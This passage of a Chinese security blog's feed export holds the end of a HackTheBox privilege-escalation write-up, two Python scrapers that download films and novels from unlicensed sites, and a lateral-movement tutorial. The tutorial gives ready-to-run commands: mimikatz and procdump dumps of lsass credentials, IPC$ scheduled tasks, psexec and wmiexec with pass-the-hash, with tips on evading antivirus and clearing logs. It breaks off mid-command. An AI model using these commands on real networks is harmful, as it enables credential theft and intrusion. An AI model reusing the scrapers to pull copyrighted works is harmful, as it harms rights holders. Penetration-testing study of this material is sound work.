alt="5"></p><p>这里不知道哪一步出了问题,迟迟收不到弹回来的shell。。。没办法,只能试试msf了。换成msf后,成功getshell:</p><p><img src="https://s2.loli.net/2022/02/08/lzXwc2EPtWITFsf.png" alt="6"></p><p>user的flag就在<code>/home/user</code>目录下。</p><h2 id="权限提升"><a href="#权限提升" class="headerlink" title="权限提升"></a>权限提升</h2><p>突然想到前段时间爆出的Linux提权通杀漏洞–<strong>CVE-2021-4034</strong>,用python3自带的http服务上传并执行后会报出如下错误:</p><p><img src="https://s2.loli.net/2022/02/08/QwScAXaqv3UfT8D.png" alt="7"></p><p><code>sudo -l</code>也没有用。好吧,看来是没法偷懒了。。。老规矩,传个pspy看进程,果然发现了root权限执行的操作:</p><p><img src="https://s2.loli.net/2022/02/08/a59zghSK2pox7cY.png" alt="8"></p><p>又是个枯燥无味的计划任务提权,htb老套路了。查找到以下关于<code>screen</code>命令的资料:</p><blockquote><p>使用“-x”选项,我们可以附加到已经附加到其他地方的会话。现在在这种情况下,会话已经以 root 身份运行,因此我们可以附加到该会话以获取 root 访问权限。</p><p>我们必须使用 export TERM=xterm 将终端模拟器设置为 Linux。您可以通过运行 echo $TERM 检查您的 TERM 设置。现在只需运行如图所示的屏幕命令。</p></blockquote><p>这里要注意,一定要在python交互终端里面执行:</p><figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br></pre></td><td class="code"><pre><code class="hljs bash">python3 -c <span class="hljs-string">"import pty;pty.spawn('/bin/bash')"</span> <span class="hljs-comment"># 开启python交互式终端</span><br><span class="hljs-built_in">export</span> TERM=xterm<br>/usr/bin/screen -x root/root<br></code></pre></td></tr></table></figure><p>提权成功:</p><p><img src="https://s2.loli.net/2022/02/08/SYjfhPwb5pkQryU.png" alt="9"></p><h2 id="总结"><a href="#总结" class="headerlink" title="总结"></a>总结</h2><p>这个靶场还是比较贴近实际的,不过对于安服仔水平的我来说,实在算不上简单。好在历经了一波三折,最终还是拿下了!</p><p><img src="https://s2.loli.net/2022/02/08/476lxjZDtkYV3Sq.png"></p>]]></content>
<categories>
<category>打靶笔记</category>
</categories>
<tags>
<tag>HackTheBox</tag>
</tags>
</entry>
<entry>
<title>Python+FFmpeg爬取云播TV电影</title>
<link href="/2022/02/24/Python+FFmpeg%E7%88%AC%E5%8F%96%E4%BA%91%E6%92%ADTV%E7%94%B5%E5%BD%B1/"/>
<url>/2022/02/24/Python+FFmpeg%E7%88%AC%E5%8F%96%E4%BA%91%E6%92%ADTV%E7%94%B5%E5%BD%B1/</url>
<content type="html"><![CDATA[<h2 id="前言"><a href="#前言" class="headerlink" title="前言"></a>前言</h2><p>最近本人在学习如何用python写爬虫,看了B站大学里的视频以后,自己模仿着写了一个,并且加入了多线程。这个爬虫适用于m3u8链接需要获取两次的视频网站,使用正则表达式提取链接。先来整理一下思路:<br>1.拿到视频播放页面的源代码,检查视频播放区的元素<br>2.找到第一个m3u8链接(一般会用反斜杠转义,所以写爬虫时要去掉反斜杠)<br>3.下载第一个m3u8链接后,提取其中的路径部分,并与链接的公共部分拼接,获得第二个m3u8链接<br>4.ffmpeg配合多线程,下载视频<br>废话不多说,上代码!</p><h2 id="正文"><a href="#正文" class="headerlink" title="正文"></a>正文</h2><h3 id="安装环境"><a href="#安装环境" class="headerlink" title="安装环境"></a>安装环境</h3><p><strong>1.Windows下载ffmpeg程序</strong><br>先准备好ffmpeg:<a href="https://ffmpeg.org/download.html">ffmpeg官网</a><br>选择对应版本下载并解压(我下载的是<code>ffmpeg-n5.0-latest-win64-lgpl-5.0</code>版本),并加入Windows系统变量(此电脑-属性-高级系统设置-环境变量):<br><img src="https://s2.loli.net/2022/02/24/tC5AxrvOlEy1enf.jpg" alt="Windows添加环境变量"><br><strong>2.Python安装ffmpy3库:</strong></p><figure class="highlight awk"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><code class="hljs awk">pip3 install ffmpy3 -i https:<span class="hljs-regexp">//mi</span>rrors.aliyun.com<span class="hljs-regexp">/pypi/</span>simple/ <br></code></pre></td></tr></table></figure><h3 id="编写代码"><a href="#编写代码" class="headerlink" title="编写代码"></a>编写代码</h3><figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br><span class="line">37</span><br><span class="line">38</span><br><span class="line">39</span><br><span class="line">40</span><br><span class="line">41</span><br><span class="line">42</span><br><span class="line">43</span><br><span class="line">44</span><br><span class="line">45</span><br><span class="line">46</span><br><span class="line">47</span><br><span class="line">48</span><br><span class="line">49</span><br><span class="line">50</span><br><span class="line">51</span><br><span class="line">52</span><br><span class="line">53</span><br><span class="line">54</span><br><span class="line">55</span><br><span class="line">56</span><br><span class="line">57</span><br><span class="line">58</span><br><span class="line">59</span><br><span class="line">60</span><br><span class="line">61</span><br><span class="line">62</span><br><span class="line">63</span><br><span class="line">64</span><br><span class="line">65</span><br><span class="line">66</span><br><span class="line">67</span><br><span class="line">68</span><br><span class="line">69</span><br></pre></td><td class="code"><pre><code class="hljs python"><span class="hljs-comment">#!/usr/bin/python3.9</span><br><span class="hljs-comment"># -*- coding: utf-8 -*-</span><br><span class="hljs-comment">#</span><br><span class="hljs-comment"># Copyright (C) 2022 HackerTerry, Inc. All Rights Reserved </span><br><span class="hljs-comment">#</span><br><span class="hljs-comment"># @Time : 2022/2/3 14:07</span><br><span class="hljs-comment"># @Author : Terry Zhang</span><br><span class="hljs-comment"># @Email : goudan1974@163.com</span><br><span class="hljs-comment"># @Blog : https://www.terry906.top</span><br><span class="hljs-comment"># @File : 线程池爬云播TV视频.py</span><br><span class="hljs-comment"># @Software: PyCharm</span><br><br><span class="hljs-keyword">import</span> requests<br><span class="hljs-keyword">import</span> re<br><span class="hljs-keyword">from</span> concurrent.futures <span class="hljs-keyword">import</span> ThreadPoolExecutor<br><span class="hljs-keyword">from</span> ffmpy3 <span class="hljs-keyword">import</span> FFmpeg<br><br><span class="hljs-keyword">def</span> <span class="hljs-title function_">get_first_m3u8</span>(<span class="hljs-params">url,headers</span>): <span class="hljs-comment"># 获取第一个m3u8链接</span><br> resp = requests.get(url,headers)<br> obj = re.<span class="hljs-built_in">compile</span>(<span class="hljs-string">r'"link_pre":"","url":"(?P<first_m3u8>.*?)","url_next"'</span>,re.S) <span class="hljs-comment"># 正则表达式可按需要修改</span><br> m3u8_url = obj.finditer(resp.text)<br> <span class="hljs-keyword">for</span> it <span class="hljs-keyword">in</span> m3u8_url:<br> first_m3u8 = it.group(<span class="hljs-string">"first_m3u8"</span>).replace(<span class="hljs-string">"\\"</span>,<span class="hljs-string">""</span>)<br> <span class="hljs-built_in">print</span>(first_m3u8)<br> <span class="hljs-keyword">return</span> first_m3u8<br><br><span class="hljs-keyword">def</span> <span class="hljs-title function_">download_first_m3u8</span>(<span class="hljs-params">url,name,headers</span>): <span class="hljs-comment"># 读取第一个m3u8文件的内容</span><br> resp = requests.get(url,headers)<br> <span class="hljs-keyword">with</span> <span class="hljs-built_in">open</span>(name, <span class="hljs-string">"w"</span>, encoding=<span class="hljs-string">"utf-8"</span>) <span class="hljs-keyword">as</span> f1:<br> f1.write(resp.text)<br> <span class="hljs-keyword">with</span> <span class="hljs-built_in">open</span>(name,<span class="hljs-string">"r"</span>) <span class="hljs-keyword">as</span> f2:<br> <span class="hljs-keyword">for</span> line <span class="hljs-keyword">in</span> f2:<br> <span class="hljs-keyword">if</span> line.startswith(<span class="hljs-string">"#"</span>):<br> <span class="hljs-keyword">continue</span><br> <span class="hljs-keyword">else</span>:<br> line.strip()<br> <span class="hljs-built_in">print</span>(line)<br> <span class="hljs-keyword">return</span> line<br><br><span class="hljs-keyword">def</span> <span class="hljs-title function_">get_second_m3u8</span>(<span class="hljs-params">url,headers</span>): <span class="hljs-comment"># 获取第二个m3u8链接</span><br> first_m3u8 = get_first_m3u8(url,headers)<br> line = download_first_m3u8(first_m3u8,<span class="hljs-string">"爬到的视频/first_m3u8.txt"</span>,headers)<br> second_m3u8 = first_m3u8.split(<span class="hljs-string">"/20220112"</span>)[<span class="hljs-number">0</span>] + line<br> <span class="hljs-built_in">print</span>(second_m3u8)<br> <span class="hljs-keyword">return</span> second_m3u8<br><br><span class="hljs-keyword">def</span> <span class="hljs-title function_">ffmpeg_path</span>(<span class="hljs-params">inputs_path, outputs_path</span>): <span class="hljs-comment"># ffmpeg下载函数</span><br> <span class="hljs-string">'''</span><br><span class="hljs-string"> :param inputs_path: 输入的文件传入字典格式{文件:操作}</span><br><span class="hljs-string"> :param outputs_path: 输出的文件传入字典格式{文件:操作}</span><br><span class="hljs-string"> :return:</span><br><span class="hljs-string"> '''</span><br> a = FFmpeg(<br> inputs={inputs_path: <span class="hljs-literal">None</span>},<br> outputs={outputs_path: <span class="hljs-string">'-c copy'</span>,<br> }<br> )<br> <span class="hljs-built_in">print</span>(a.cmd)<br> a.run()<br><br><span class="hljs-keyword">if</span> __name__ == <span class="hljs-string">'__main__'</span>:<br> url = <span class="hljs-string">"https://www.yunbtv.net/vodplay/ITgou-1-1.html"</span> <span class="hljs-comment"># 使用时只需更改这里的URL即可</span><br> headers = {<br> <span class="hljs-string">"User-Agent"</span>: <span class="hljs-string">"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/97.0.4692.71 Safari/537.36"</span>,<br> <span class="hljs-string">"Referer"</span>: <span class="hljs-string">"https://www.yunbtv.net/"</span><br> }<br> second_m3u8 = get_second_m3u8(url,headers)<br> <span class="hljs-keyword">with</span> ThreadPoolExecutor(<span class="hljs-number">50</span>) <span class="hljs-keyword">as</span> t:<br> t.submit(ffmpeg_path,second_m3u8,<span class="hljs-string">"爬到的视频/IT狗第一集.mp4"</span>)<br></code></pre></td></tr></table></figure><p>这里由于第二个m3u8文件中自带AES解密密钥的链接地址,所以无需单独考虑解密的问题,交给ffmpeg解决即可。</p>]]></content>
<categories>
<category>Python安全开发</category>
</categories>
<tags>
<tag>爬虫</tag>
</tags>
</entry>
<entry>
<title>Python爬虫爬取笔趣阁小说</title>
<link href="/2022/02/24/Python%E7%88%AC%E8%99%AB%E7%88%AC%E5%8F%96%E7%AC%94%E8%B6%A3%E9%98%81%E5%B0%8F%E8%AF%B4/"/>
<url>/2022/02/24/Python%E7%88%AC%E8%99%AB%E7%88%AC%E5%8F%96%E7%AC%94%E8%B6%A3%E9%98%81%E5%B0%8F%E8%AF%B4/</url>
<content type="html"><![CDATA[<p>这是本人学python后的第一个作品,算法可能不够完美,请大佬多多指教!</p><p>网址:<a href="https://www.bbiquge.net/">https://www.bbiquge.net/</a></p><p>使用方法:只需修改程序入口的URL以及保存文件的路径即可,URL是小说介绍页的URL</p><p>下面贴出代码:</p><figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br><span class="line">37</span><br><span class="line">38</span><br><span class="line">39</span><br><span class="line">40</span><br><span class="line">41</span><br><span class="line">42</span><br><span class="line">43</span><br><span class="line">44</span><br><span class="line">45</span><br><span class="line">46</span><br><span class="line">47</span><br><span class="line">48</span><br><span class="line">49</span><br><span class="line">50</span><br><span class="line">51</span><br><span class="line">52</span><br><span class="line">53</span><br><span class="line">54</span><br><span class="line">55</span><br><span class="line">56</span><br><span class="line">57</span><br><span class="line">58</span><br><span class="line">59</span><br><span class="line">60</span><br><span class="line">61</span><br><span class="line">62</span><br><span class="line">63</span><br><span class="line">64</span><br><span class="line">65</span><br><span class="line">66</span><br></pre></td><td class="code"><pre><code class="hljs python"><span class="hljs-comment">#!/usr/bin/python3.9</span><br><span class="hljs-comment"># -*- coding: utf-8 -*-</span><br><span class="hljs-comment">#</span><br><span class="hljs-comment"># Copyright (C) 2022 HackerTerry, Inc. All Rights Reserved</span><br><span class="hljs-comment">#</span><br><span class="hljs-comment"># @Time : 2022/1/24 22:12</span><br><span class="hljs-comment"># @Author : Terry Zhang</span><br><span class="hljs-comment"># @Email : goudan1974@163.com</span><br><span class="hljs-comment"># @Blog : https://terry906.top</span><br><span class="hljs-comment"># @File : 异步爬小说.py</span><br><span class="hljs-comment"># @Software: PyCharm</span><br><br><span class="hljs-comment"># 这里以刘慈欣的《流浪地球》为例</span><br><span class="hljs-comment"># 所有章节的内容和名称:https://www.bbiquge.net/book_126623/ </span><br><span class="hljs-comment"># 某一个章节内容:https://www.bbiquge.net/book_126623/45495704.html</span><br><br><span class="hljs-keyword">import</span> requests<br><span class="hljs-keyword">import</span> os<br><span class="hljs-keyword">import</span> json<br><span class="hljs-keyword">from</span> lxml <span class="hljs-keyword">import</span> etree<br><br>os.environ[<span class="hljs-string">'NO_PROXY'</span>] = <span class="hljs-string">'www.bbiquge.net'</span><br><span class="hljs-built_in">dict</span> = {}<br>title_list = []<br>link_list = []<br><br><span class="hljs-keyword">def</span> <span class="hljs-title function_">getCatalog</span>(<span class="hljs-params">url,headers</span>):<br> resp = requests.get(url,headers).text<br> tree = etree.HTML(resp)<br> dl_list = tree.xpath(<span class="hljs-string">"/html/body/div[4]/dl[@class='zjlist']/dd/a[@href]"</span>)<br> <span class="hljs-keyword">for</span> dl <span class="hljs-keyword">in</span> dl_list:<br> <span class="hljs-keyword">for</span> i <span class="hljs-keyword">in</span> <span class="hljs-built_in">range</span>(<span class="hljs-number">0</span>,<span class="hljs-built_in">len</span>(dl_list)):<br> title = dl.xpath(<span class="hljs-string">"/html/body/div[4]/dl/dd/a/text()"</span>)<br> title_list.append(<span class="hljs-built_in">str</span>(title[i]))<br> link = dl.xpath(<span class="hljs-string">"/html/body/div[4]/dl/dd/a/@href"</span>)<br> link_list.append(<span class="hljs-built_in">str</span>(link[i]))<br> <span class="hljs-built_in">dict</span>[title[i]] = url + link[i]<br> <span class="hljs-keyword">with</span> <span class="hljs-built_in">open</span>(<span class="hljs-string">"爬到的小说/小说列表.txt"</span>, <span class="hljs-string">"w"</span>) <span class="hljs-keyword">as</span> f:<br> f.write(json.dumps(<span class="hljs-built_in">dict</span>,ensure_ascii=<span class="hljs-literal">False</span>)) <span class="hljs-comment"># json库中的dumps方法把字典写入文件</span><br> <span class="hljs-built_in">print</span>(<span class="hljs-built_in">dict</span>)<br> <span class="hljs-keyword">return</span> <span class="hljs-built_in">dict</span><br><br><br><span class="hljs-keyword">def</span> <span class="hljs-title function_">getContent</span>(<span class="hljs-params">url,headers</span>):<br> resps = requests.get(url,headers).text<br> trees = etree.HTML(resps)<br> article = trees.xpath(<span class="hljs-string">"/html/body/div[3]/div[2]/div[1][@id='content']/text()"</span>)<br> <span class="hljs-built_in">print</span>(article)<br> <span class="hljs-keyword">return</span> article<br><br><span class="hljs-keyword">if</span> __name__ == <span class="hljs-string">'__main__'</span>:<br> url = <span class="hljs-string">'https://www.bbiquge.net/book_126623/'</span><br> headers = {<br> <span class="hljs-string">"User-Agent"</span>: <span class="hljs-string">"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/97.0.4692.71 Safari/537.36 Edg/97.0.1072.55"</span>,<br> <span class="hljs-string">"Referer"</span>: <span class="hljs-string">"https://www.bbiquge.net/book_126623/"</span>,<br> <span class="hljs-string">"Connection"</span>: <span class="hljs-string">"close"</span><br> }<br> <span class="hljs-keyword">if</span> <span class="hljs-keyword">not</span> os.path.exists(<span class="hljs-string">"爬到的小说/笔趣阁"</span>):<br> <span class="hljs-built_in">print</span>(<span class="hljs-string">"没有'笔趣阁'这个目录,正在为你创建>>>>>"</span>)<br> os.mkdir(<span class="hljs-string">"爬到的小说/笔趣阁"</span>)<br> <span class="hljs-built_in">print</span>(<span class="hljs-string">"创建成功>>>>>"</span>)<br> dicts = getCatalog(url,headers)<br> <span class="hljs-keyword">for</span> key,value <span class="hljs-keyword">in</span> dicts.items():<br> articles = getContent(value, headers)<br> <span class="hljs-keyword">with</span> <span class="hljs-built_in">open</span>(<span class="hljs-string">"爬到的小说/笔趣阁/流浪地球"</span> + key + <span class="hljs-string">".txt"</span>, <span class="hljs-string">"w"</span>, encoding=<span class="hljs-string">"utf-8"</span>) <span class="hljs-keyword">as</span> f:<br> f.writelines(<span class="hljs-built_in">str</span>(articles).replace(<span class="hljs-string">"&quot;"</span>,<span class="hljs-string">""</span>).replace(<span class="hljs-string">"\xa0"</span>,<span class="hljs-string">""</span>) + <span class="hljs-string">'\n'</span>) <span class="hljs-comment"># writelines方法可将字符串或列表写入文件中</span><br></code></pre></td></tr></table></figure>]]></content>
<categories>
<category>Python安全开发</category>
</categories>
<tags>
<tag>爬虫</tag>
</tags>
</entry>
<entry>
<title>内网渗透(五)--横向移动</title>
<link href="/2022/01/25/%E5%86%85%E7%BD%91%E6%B8%97%E9%80%8F%EF%BC%88%E4%BA%94%EF%BC%89-%E6%A8%AA%E5%90%91%E7%A7%BB%E5%8A%A8/"/>
<url>/2022/01/25/%E5%86%85%E7%BD%91%E6%B8%97%E9%80%8F%EF%BC%88%E4%BA%94%EF%BC%89-%E6%A8%AA%E5%90%91%E7%A7%BB%E5%8A%A8/</url>
<content type="html"><![CDATA[<h2 id="简介"><a href="#简介" class="headerlink" title="简介"></a>简介</h2><p>在内网渗透中,当攻击者获取到内网某台机器的控制权后,会以被攻陷的主机为跳板,通过收集域内凭证等各种方法,访问域内其他机器,进一步扩大资产范围。通过此类手段,攻击者最终可能获得域控制器的访问权限,甚至完全控制基于Windows操作系统的整个内网环境,控制域环境下的全部机器。当然,域内也有可能出现Linux主机,但概率很低。</p><h2 id="利用方式"><a href="#利用方式" class="headerlink" title="利用方式"></a>利用方式</h2><p>首先,信息收集是必不可少的。我们一般使用mimikatz(俗称”法国大面包“)进行密码或hash值的抓取。注意,使用这款工具需要管理员权限,并且实战中还要做好免杀。如果目标主机是Linux系统,则可使用mimipenguin抓取。</p><p>下面列举出了几个常用命令:</p><figure class="highlight powershell"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><code class="hljs powershell">privilege::debug <span class="hljs-comment">#提升至debug权限</span><br>sekurlsa::logonpasswords <span class="hljs-comment">#抓取密码</span><br></code></pre></td></tr></table></figure><p>当mimikatz无法正常上传或者被查杀时,mimikatz也可以配合procdump使用。procdump是Windows自带的软件,不会被杀软拦截查杀。下面是常用命令:</p><figure class="highlight powershell"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br></pre></td><td class="code"><pre><code class="hljs powershell">procdump上执行:<br>procdump <span class="hljs-literal">-accepteula</span> <span class="hljs-literal">-ma</span> lsass.exe lsass.dmp<br>mimikatz上执行:<br>privilege::debug <br>sekurlsa::minidump lsass.dmp<br>sekurlsa::logonPasswords full<br></code></pre></td></tr></table></figure><p><strong>通过IPC连接创建计划任务(目标主机需开放135和445端口)</strong></p><p>IPC$(Internet Process Connection) 是共享 “ 命名管道 “ 的资源,它是为了让进程间通信而开放的命名管道,通过提供可信任的用户名和口令,连接双方可以建立安全的通道并以此通道进行加密数据的交换,从而实现对远程计算机的访问。IPC$是NT2000的一项新功能,它有一个特点,即在同一时间内,两个IP之间只允许建立一个连接。IPC 可以通过验证用户名和密码获得相应的权限,通常在远程管理计算机和查看计算机的共享资源时使用。</p><p>通过ipc$,可以与目标机器建立连接。利用这个连接,不仅可以访问目标机器中的文件,进行上传、下载等操作,还可以在目标机器上运行其他命令,以获取目标机器的目录结构、用户列表等信息。</p><p>利用流程:</p><p>1.建立 IPC 链接到目标主机</p><p>2.拷贝要执行的命令脚本到目标主机</p><p>3.查看目标时间,创建计划任务(at、schtasks)定时执行拷贝到的脚本</p><p>4.删除 IPC 链接</p><p>这里仅介绍at和schtasks两种计划任务的使用,实战中要根据不同的系统版本来选择不同种类的计划任务。</p><p>1.at(Windows server<2012)</p><figure class="highlight powershell"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br></pre></td><td class="code"><pre><code class="hljs powershell">net use \\目标机器IP\ipc<span class="hljs-variable">$</span> <span class="hljs-string">"明文密码"</span> /user:域名\域管理员用户名 <span class="hljs-comment">#建立ipc连接</span><br><span class="hljs-built_in">copy</span> 文件名.bat \\目标机器IP\c<span class="hljs-variable">$</span> <span class="hljs-comment">#拷贝bat文件到目标机器,文件内写有系统命令</span><br>at \\目标机器IP 时:分 c:\add.bat <span class="hljs-comment">#添加计划任务</span><br></code></pre></td></tr></table></figure><p>2.schtasks(Windows server>=2012)</p><figure class="highlight powershell"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br></pre></td><td class="code"><pre><code class="hljs powershell">net use \\目标机器IP\ipc<span class="hljs-variable">$</span> <span class="hljs-string">"明文密码"</span> /user:域名\域管理员用户名 <span class="hljs-comment">#建立ipc连接</span><br><span class="hljs-built_in">copy</span> add.bat \\目标机器IP\c<span class="hljs-variable">$</span> <span class="hljs-comment">#复制文件到其C盘</span><br>schtasks /create /s 目标机器IP /ru <span class="hljs-string">"SYSTEM"</span> /tn adduser /<span class="hljs-built_in">sc</span> DAILY /tr c:\文件名.bat /F 对应执行文件 <span class="hljs-comment">#创建adduser任务</span><br>schtasks /run /s 目标机器IP /tn adduser /i <span class="hljs-comment">#运行adduser任务</span><br>schtasks /delete /s 目标机器IP /tn adduser /f <span class="hljs-comment">#删除adduser任务</span><br></code></pre></td></tr></table></figure><p><strong>利用SMB服务(目标主机需开放445端口)</strong></p><p>下载地址:<a href="https://docs.microsoft.com/zh-cn/sysinternals/downloads/psexec">https://docs.microsoft.com/zh-cn/sysinternals/downloads/psexec</a></p><p>psexec 是 windows 下非常好的一款远程命令行工具。psexec的使用不需要对方主机开放3389端口,只需要对方开启admin$共享 (该共享默认开启)。但是,假如目标主机开启了防火墙,psexec也是不能使用的,会提示找不到网络路径。由于psexec是Windows提供的工具,所以杀毒软件将其列在白名单中。并且连接会产生日志,所以要注意清理。</p><p>psexec的基本原理:</p><p>1.通过ipc$连接,释放二进制文件psexecsvc.exe到目标</p><p>2.通过服务管理SCManager远程创建一个psexec服务,并启动服务</p><p>3.客户端连接执行命令,服务端通过服务启动相应的程序执行命令并回显数据</p><p>4.运行结束后删除服务</p><p>它的利用分为两种情况,一种需要建立IPC连接,需要知道明文密码;另一种不需要建立IPC连接,可以用hash值认证,但是需要使用第三方软件包IMpacket,且实战中需要做免杀处理。</p><p>第一种情况:</p><figure class="highlight powershell"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><code class="hljs powershell">net use \\目标机器IP\ipc<span class="hljs-variable">$</span> <span class="hljs-string">"明文密码"</span> /user:管理员用户名<br>psexec \\目标机器IP <span class="hljs-literal">-s</span> cmd <span class="hljs-comment">#需要先有 ipc 链接,-s 以 System 权限运行</span><br></code></pre></td></tr></table></figure><p>第二种情况:</p><figure class="highlight powershell"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br></pre></td><td class="code"><pre><code class="hljs powershell">psexec \\目标机器IP <span class="hljs-literal">-u</span> 域管账户 <span class="hljs-literal">-p</span> 明文密码 <span class="hljs-literal">-s</span> cmd<br>psexec <span class="hljs-literal">-hashes</span> :<span class="hljs-variable">$HASH</span><span class="hljs-variable">$</span> ./域管账户<span class="hljs-selector-tag">@</span>目标机器IP<br>psexec <span class="hljs-literal">-hashes</span> :<span class="hljs-variable">$HASH</span><span class="hljs-variable">$</span> 域名/域管账户<span class="hljs-selector-tag">@</span>目标机器IP<br>psexec <span class="hljs-literal">-hashes</span> :hash值 ./administrator<span class="hljs-selector-tag">@</span>目标机器IP <span class="hljs-comment">#官方 Pstools无法采用 hash 连接</span><br></code></pre></td></tr></table></figure><p>当然也可以用msf自带的psexec模块进行攻击,模块路径是<code>exploit/windows/smb/psexec</code>。</p><p><strong>利用WMI服务(目标主机需开放135管理端口和445回显端口)</strong></p><p>WMI的全名为“Windows Management Instrumentation”。从Windows 98开始,Windows操作系统都支持WMI。WMI是由一系列工具集组成的,可以通过/node选项使用端口135上的远程过程调用(RPC)进行通信以进行远程访问,它允许系统管理员远程执行自动化管理任务,例如远程启动服务或执行命令。</p><p>同样的,WMI服务有三种连接方式,它们各有优缺点。</p><p>第一种是Windows自带的wmic,它只支持明文传递密码,且命令执行没有回显,我们只能把回显输出到txt文本里查看。但正因为它是系统自带的,我们不需要考虑免杀的问题。</p><figure class="highlight powershell"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><code class="hljs powershell">wmic /node:目标机器IP /user:域管账户 /password:域管明文密码 <span class="hljs-keyword">process</span> call create <span class="hljs-string">"cmd.exe /c 系统命令 >C:\文件名.txt"</span><br></code></pre></td></tr></table></figure><p>第二种同样是Windows自带的CScript,需要配合vbs脚本使用(<em>下载地址:<a href="https://pan.baidu.com/s/1Vh4ELTFvyBhv3Avzft1fCw">https://pan.baidu.com/s/1Vh4ELTFvyBhv3Avzft1fCw</a> 提取码:xiao</em>)。它只支持明文传递密码,但命令执行有回显,同样无需考虑免杀。</p><figure class="highlight powershell"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><code class="hljs powershell">cscript //nologo wmiexec.vbs /shell 目标机器IP 域管账户 域管明文密码<br></code></pre></td></tr></table></figure><p>第三种需要借助第三方软件包IMpacket,支持明文或hash传递密码,有回显,但是要考虑免杀。</p><figure class="highlight powershell"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br></pre></td><td class="code"><pre><code class="hljs powershell">wmiexec ./本地管理员账户:明文密码<span class="hljs-selector-tag">@</span>目标机器IP <span class="hljs-string">"系统命令"</span><br>wmiexec 域名/域管账户:明文密码<span class="hljs-selector-tag">@</span>目标机器IP <span class="hljs-string">"系统命令"</span><br>wmiexec <span class="hljs-literal">-hashes</span> :hash值 ./本地管理员账户<span class="hljs-selector-tag">@</span>目标机器IP <span class="hljs-string">"系统命令"</span><br>wmiexec <span class="hljs-literal">-hashes</span> :hash值 域名/域管账户<span class="hljs-selector-tag">@</span>目标机器IP <span class="hljs-string">"系统命令"</span><br></code></pre></td></tr></table></figure><p><strong>利用Python脚本批量利用hash</strong></p><p>该脚本是impacket工具包中的一个工具,主要在从Linux像Windows进行横向渗透时使用,十分强大,可以走socks代理进入内网。</p><p>GitHub项目地址:<a href="https://github.com/CoreSecurity/impacket/blob/master/examples/wmiexec.py">https://github.com/CoreSecurity/impacket/blob/master/examples/wmiexec.py</a></p><p>部分转载自:[内网渗透测试:内网横向移动基础总结 - FreeBuf网络安全行业门户<a href="https://www.freebuf.com/articles/network/251364.html]">https://www.freebuf.com/articles/network/251364.html]</a>(内网渗透测试:内网横向移动基础总结 - FreeBuf网络安全行业门户<a href="https://www.freebuf.com/articles/network/251364.html">https://www.freebuf.com/articles/network/251364.html</a>)</p><p><strong>哈希传递(PTH)</strong></p><p>大多数渗透测试人员都听说过哈希传递(Pass The Hash)攻击,该方法通过找到与账户相关的密码散列值(通常是 NTLM Hash)来进行攻击。在域环境中,用户登录计算机时使用的大都是域账号,大量计算机在安装时会使用相同的本地管理员账号和密码,因此,如果计算机的本地管理员账号和密码也是相同的,攻击者就能使用哈希传递攻击的方法登录内网中的其他计算机。同时,通过哈希传递攻击攻击者不需要花时间破解哈希密在Windows网络中,散列值就是用来证明身份的(有正确的用户名和密码散列值,就能通过验证),而微软自己的产品和工具显然不会支持这种攻击,于是,攻击者往往会使用第三方工具来完成任务。在Windows Server2012R2及之后版本的操作系统中,默认在内存中不会记录明文密码,因此,攻击者往往会使用工具将散列值传递到其他计算机中,进行权限验证,实现对远程计算机的控制。</p><p>下面以mimikatz为例:</p><figure class="highlight powershell"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br></pre></td><td class="code"><pre><code class="hljs powershell">privilege::debug <br>sekurlsa::logonpasswords <br>sekurlsa::pth /user:域管账户 /domain:域名 